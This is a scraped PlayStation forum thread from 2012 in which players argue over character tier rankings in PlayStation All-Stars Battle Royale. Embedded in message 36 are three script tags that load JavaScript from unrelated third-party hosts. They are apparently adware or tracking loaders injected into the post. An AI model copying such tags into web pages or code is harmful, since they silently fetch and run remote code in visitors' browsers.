Showing results for 
Search instead for 
Do you mean 
First Son
3 posts

Re: Playstation All Stars Battle Royale - S Tier

Nov 22, 2012

Gotta second Redskinsrock2689, I've been playing mostly Dante and Radec, and while they're good and pretty noob-friendly, they both have major difficulties:
Dante:
Dante's supers are possibly the best in the game (perhaps second to Ratchet's), and his close range game is unbeatable, but he has only a couple reliable options for approach, and at range all he can do is poke, so a skilled keepaway artist can give him a very hard time.  Compare to Kratos and Nariko, who have ranged command-grabs, good projectiles, and a whole host of good leap-in attacks.
Radec:
For all ranged fighters (i.e, Radec, Drake, Sackboy, and Ratchet), keep-away is VITAL to his game (and will be more vital as people get better at hunting down campers), but Radec's keepaway game is pretty predictable by comparison.  Your best options for keepaway are the laser, the electric grenade, and the shotgun/pistol combos, and people will know to expect them.  The other three ranged characters have almost half of their moves devoted to mid range traps and mobility moves, so Radec can't really keep up with that.

Please use plain text.
Message 31 of 38 (425 Views)
0 Likes
Lombax Warrior
123 posts

Nov 22, 2012

What's this tier stuff about actually? I suppose everyone can kick everyones **bleep** if he takes enough time to get into a character so I don't give a **bleep** which character is "top tier" or whatever. But unfortunately the first character I ever wanted to play in this game (even long before he was actually announced) is Dante...but now all the kids seem to play him cuz he is "top tier" and looks "bad **bleep**" that really pisses me off -.-

Please use plain text.
Message 32 of 38 (423 Views)
0 Likes
Treasure Hunter
5310 posts

Nov 22, 2012
Dante isn't S-Teir. He's an up close combo character with no options of approach. Right now his move set is broken because of two things that don't work. I would put Dante in the B-Teir although he should be in the S-Teir
Please use plain text.
Message 33 of 38 (423 Views)
0 Likes
Treasure Hunter
4668 posts

Nov 22, 2012
I'd argue almost all of those. Kratos is entirely too weak at this point, Raiden gets demolished pretty easily, and Radec's really easy to beat as well. Dante and Sly are understandable, and maybe even Raiden, but there's no way the other two are up there. Radec's high A tier and Kratos is low A tier. Honestly, though, I hate tiers in general as far as this game goes, because the characters are balanced so that they're all truly on an even playing field.

Besides, I can beat all of those characters with my Ratchet any day of the week. (Not to say he's S tier, but that I play him well.)
ecdf9e46
Visit PAStadium's YouTube Channel for all of your Project Axis needs!
Please use plain text.
Message 34 of 38 (415 Views)
0 Likes
Uncharted Territory
1540 posts

Nov 22, 2012
Not even radec he gets destroyed. Put in ratchet, his level one almost always gets a double or triple kill, he can get 5 kills with his level 2 and his level 3 is average
Please use plain text.
Message 35 of 38 (404 Views)
0 Likes
Gaming Beast
2167 posts

Nov 22, 2012
Hard to say at this point because this is a game where many characters' performance will be determined by tier list.
For example, I play Big Daddy, who does really well against most of the characters listed in the OP, but loses abysmally to someone like Sackboy (Seriously, **bleep** that guy).
That being said, there are a lot of characters who look like they could be really good but we aren't running into much. FP and Dan are two prominent examples.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 36 of 38 (396 Views)
0 Likes
Survivor
2388 posts

Nov 22, 2012
I think its way too early for tier listings, ive beaten down a few Raidens and Kratoses as Sir Dan. its all about how comfortable you are with the character. It took me a while to get Ratchet down at first but now he's my second best.
Please use plain text.
Message 37 of 38 (394 Views)
0 Likes
Wastelander
817 posts

Nov 22, 2012
It's already been popularly decided - Kratos and Raiden. Both will be nerfed soon though.
Please use plain text.
Message 38 of 38 (388 Views)
0 Likes